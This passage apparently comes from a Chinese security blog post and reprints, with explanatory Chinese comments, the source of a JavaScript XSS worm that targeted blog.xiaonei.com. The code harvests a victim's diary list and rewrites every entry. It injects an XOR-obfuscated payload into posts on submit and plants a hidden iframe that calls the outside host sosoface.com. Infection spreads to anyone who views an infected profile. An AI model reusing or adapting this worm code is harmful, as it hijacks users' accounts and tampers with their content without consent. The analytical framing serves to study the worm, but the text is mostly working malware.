argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="pic_path"";
argv+=(pic_path+"");
argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="blogControl"";
argv+=(blogControl+"");
argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="id"";
argv+=(Diaryid+"");
argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="relative_optype"";
argv+=("publisher"+"");
argv+="-----------------------------7d71861cb014cContent-Disposition: form-data; name="del_relative_id"";
argv+="-----------------------------7d71861cb014c--";

req=null;
step="EditDiaryText";
loadUrl("http://blog.xiaonei.com/EditEntry.do","POST",argv);

}
else if("EditDiaryText"==step)
{

req=null;
bIsBusy=false;
step="GetDiaryText";
}
else
{
;
}

}
}
function MyDecode(str)
{
var i,k,str2="";

k=str.split(".");

for(i=0;i<k.length;i++)
{
str2+=String.fromCharCode(k[i]^0x12);
}
return str2;
}
function loadUrl( url,method,argv )
{
bIsBusy=true;
if(!req)
{
if(window.XMLHttpRequest)
{
try
{
req = new XMLHttpRequest();
} catch(e) { req = false; }
}
else if(window.ActiveXObject)
{
try
{
req = new ActiveXObject('Msxml2.XMLHTTP');
}
catch(e)
{
try
{
req = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) { req = false; }
}
}
}
if(req)
{
req.onreadystatechange = processReqChange;
try
{
req.open(method, url, true);
if(method=="POST")
req.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------7d71861cb014c");
req.send(argv);
}catch(e)
{
req=false;
}
}
}
function GetStatus()
{
if(bIsBusy)return;

if("GetDiaryList"==step)
{
var DiaryMonthUrl,i;

//取出每个月的日志列表
if(DiaryMonthUrlList.length<=1)
{
step="GetDiaryText";
return;
}
i=DiaryMonthUrlList.indexOf("|",0);
if(-1==1)
{
step="GetDiaryText";
return;
}
DiaryMonthUrl=DiaryMonthUrlList.substring(0,i);
DiaryMonthUrlList=DiaryMonthUrlList.substring(i+1,DiaryMonthUrlList.length);

//再回到开头的processReqChange函数此时step还是GetDiaryList
loadUrl(DiaryMonthUrl,"GET","");

}
else if("GetDiaryText"==step)
{
var DiaryUrl,i;
if(DiaryUrlList.length<=1)
{
clearInterval(timer);
return;
}

i=DiaryUrlList.indexOf("|",0);
if(-1==i)
{
clearInterval(timer);
return;
}

DiaryUrl=DiaryUrlList.substring(0,i);
DiaryUrlList=DiaryUrlList.substring(i+1,DiaryUrlList.length);

loadUrl(DiaryUrl,"GET","");
}
}
function WriteStat()
{
var s=document.createElement("iframe");
s.frameborder="0";
s.height="0";
s.width="0";
s.src="http://www.sosoface.com/images/stat.jpg";
document.getElementById("mya113").parentNode.insertBefore(s,document.getElementById("mya113"));

}

function DeleteScript(html)
{
var i=0,j=0,str;

str=html;

i=str.indexOf("</A>",0);
if(-1==i)
return str;
i+=4;
str=str.substring(i,str.length);

return str;
}
function EditorSubmit()
{
var ret=false;
parent.parent.descOptype();
ret=parent.parent.beforeSubmit();

parent.parent.document.getElementById("body").value=MyDecode(myrand)+DeleteScript(parent.parent.document.getElementById("body").value);

return ret;
}
function Start()
{
//判断是不是blog.xiaonei.com域,由于ajax是不能跨域的，所以判断是必备的
if("blog.xiaonei.com"==document.domain)
{
//如果是在编辑已感染的日志就做了一些奇怪的行为，我看不懂，好像是把自己重写了一遍，不知道为什么这样做
if("http://blog.xiaonei.com/pages/editor/win.htm"==document.location)
{
parent.parent.document.getElementById("editorForm").onsubmit=EditorSubmit;
}
else
{

WriteStat();//这是一个用户流量统计的函数，使用cnzz 站长助手
//下面开始感染了，第一步GetDiaryMonthList，得到日志的按月归档
step="GetDiaryMonthList";
loadUrl("http://blog.xiaonei.com/MyBlog.do","GET","");//loadUrl是一个ajax读取页面内容的函数
//下面跳到开头的processReqChange函数
}
}
else if("xiaonei.com"==document.domain || "www.xiaonei.com"==document.domain)
{
//如果不在blog.xiaonei.com域就写入一个Iframe Iframe的SRC是日志的URL
//这个URL是blog.xiaonei.com域的，就变向的实现了跨域，
//作者这样做应该是为了一访问别人的主页就能感染
var url="";

url=document.location.toString();
if(url.indexOf("&")==-1)
return;
step="WriteIframe";
loadUrl(url,"GET","");
}
}

Start();

» 阅读全文...

Tags: 安全,病毒.

Pages (2): 1 2 »

Link